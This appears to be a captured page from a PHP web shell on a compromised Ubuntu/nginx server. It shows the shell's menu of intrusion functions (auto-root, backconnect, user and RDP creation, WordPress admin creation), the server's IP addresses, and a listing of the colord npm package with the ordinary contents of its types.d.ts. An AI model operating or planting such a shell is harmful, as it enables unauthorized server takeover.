Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
quiz1 /
node_modules /
colord /
[ HOME SHELL ]
Name
Size
Permission
Action
plugins
[ DIR ]
dr-xr-xr-x
CHANGELOG.md
3.46
KB
-rw-rw-rw-
LICENSE.md
1.06
KB
-rw-rw-rw-
README.md
37.48
KB
-rw-rw-rw-
colord.d.ts
3.27
KB
-rw-rw-rw-
constants.d.ts
368
B
-rw-rw-rw-
extend.d.ts
217
B
-rw-rw-rw-
helpers.d.ts
908
B
-rw-rw-rw-
index.d.ts
347
B
-rw-rw-rw-
index.js
5.79
KB
-rw-rw-rw-
index.mjs
5.73
KB
-rw-rw-rw-
package.json
5.18
KB
-rw-rw-rw-
parse.d.ts
434
B
-rw-rw-rw-
random.d.ts
80
B
-rw-rw-rw-
types.d.ts
1.98
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : types.d.ts
export declare type RgbColor = { r: number; g: number; b: number; }; export declare type HslColor = { h: number; s: number; l: number; }; export declare type HsvColor = { h: number; s: number; v: number; }; export declare type HwbColor = { h: number; w: number; b: number; }; export interface XyzColor { x: number; y: number; z: number; } export interface LabColor { l: number; a: number; b: number; } export interface LchColor { l: number; c: number; h: number; } export interface CmykColor { c: number; m: number; y: number; k: number; } declare type WithAlpha<O> = O & { a: number; }; export declare type RgbaColor = WithAlpha<RgbColor>; export declare type HslaColor = WithAlpha<HslColor>; export declare type HsvaColor = WithAlpha<HsvColor>; export declare type HwbaColor = WithAlpha<HwbColor>; export declare type XyzaColor = WithAlpha<XyzColor>; export declare type LabaColor = LabColor & { alpha: number; }; export declare type LchaColor = WithAlpha<LchColor>; export declare type CmykaColor = WithAlpha<CmykColor>; export declare type ObjectColor = RgbColor | RgbaColor | HslColor | HslaColor | HsvColor | HsvaColor | HwbColor | HwbaColor | XyzColor | XyzaColor | LabColor | LabaColor | LchColor | LchaColor | CmykColor | CmykaColor; export declare type AnyColor = string | ObjectColor; export declare type InputObject = Record<string, unknown>; export declare type Format = "name" | "hex" | "rgb" | "hsl" | "hsv" | "hwb" | "xyz" | "lab" | "lch" | "cmyk"; export declare type Input = string | InputObject; export declare type ParseResult = [RgbaColor, Format]; export declare type ParseFunction<I extends Input> = (input: I) => RgbaColor | null; export declare type Parser<I extends Input> = [ParseFunction<I>, Format]; export declare type Parsers = { string: Array<Parser<string>>; object: Array<Parser<InputObject>>; }; export {};
Close